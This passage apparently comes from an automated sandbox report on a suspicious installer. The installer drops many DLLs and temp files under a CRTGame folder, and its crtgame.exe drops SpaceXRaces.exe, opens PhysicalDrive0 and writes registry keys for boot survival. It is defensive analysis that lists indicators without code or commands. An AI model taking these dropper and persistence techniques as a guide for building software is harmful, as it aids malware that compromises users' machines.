Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\wavpackdll.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-UHUNS.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-CJ9O9.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\tak_deco_lib.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\libdtsdec.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-9AV62.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Users\user\AppData\Local\Temp\is-2DP67.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-H36N8.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-RUH59.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\libwinpthread-1.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-QOSQ7.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-2BNI8.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-MB554.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-3L2G6.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Users\user\AppData\Local\Temp\is-2DP67.tmp\_isetup\_isdecmp.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-HBA5G.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-RF28Q.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-UT63K.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-ENF4U.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\uninstall\is-4K1KF.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\sqlite3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-8CIMQ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\opusenc.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\mp3gain.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\pcm2dsd.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-PQ8T3.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-1V1KO.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-82P0C.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\utils.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-AE6QK.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libvorbis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-SEJ8F.tmpJump to dropped file
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile created: C:\ProgramData\SpaceXRaces\SpaceXRaces.exeJump to dropped file

Boot Survival

Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 5_2_00401A58
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 7_2_02A3F29C
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Query
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 5_2_004026F0 GetModuleHandleA,GetModuleFileNameA,GetCommandLineW,CommandLineToArgvW,GetLocalTime,lstrcmpiW,CreateFileA,CloseHandle,ExitProcess,lstrcmpiW,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,SetEvent,ExitProcess,StartServiceCtrlDispatcherA, 5_2_004026F0
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 1_2_00423C1C
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 1_2_00423C1C
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_004241EC IsIconic,SetActiveWindow,SetFocus, 1_2_004241EC
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_004241A4 IsIconic,SetActiveWindow, 1_2_004241A4
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 1_2_00418394
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 1_2_0042286C
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_004175A8 IsIconic,GetCapture, 1_2_004175A8
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_00417CDE IsIconic,SetWindowPos, 1_2_00417CDE
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 1_2_00417CE0
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_00481CB0 IsIconic,GetWindowLongA,ShowWindow,ShowWindow, 1_2_00481CB0
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0044AEAC LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0044AEAC
Source: C:\Users\user\Desktop\KRdh0OaXqH.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary, 5_2_00401B54
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary, 7_2_02A3F3A0
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Window / User API: threadDelayed 1511
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Window / User API: threadDelayed 8446
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-2JFSM.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-H4RQI.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-SG9N2.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\takdec.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-TF38E.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\lame_enc.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2DP67.tmp\_isetup\_RegDLL.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-MSL58.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-72UK0.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-DC7IR.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-I2830.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-BUF5F.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-C09DN.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-O5AH5.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-RDHKR.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-M699B.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-8REH5.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-UP2KF.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2DP67.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-FL34R.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\sd.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-UJQGJ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\rg_ebur128.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-5CFA9.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-2Q15C.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\uchardet.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libmp4v2.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libsox-3.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libsoxr.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-9OEDN.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-V3CB3.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-0NR14.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-TDV1O.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2DP67.tmp\_isetup\_iscrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libwebp.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\swresample-4.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-MDCMM.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-4IVEL.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-R8DJL.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-3PB3G.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-PKSJK.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\uninstall\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libFLAC_dynamic.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-JN15J.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-9QS5M.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-41E97.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-BLG4U.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\wavpackdll.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-UHUNS.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\tak_deco_lib.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-CJ9O9.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libdtsdec.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-9AV62.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2DP67.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-H36N8.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-RUH59.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)
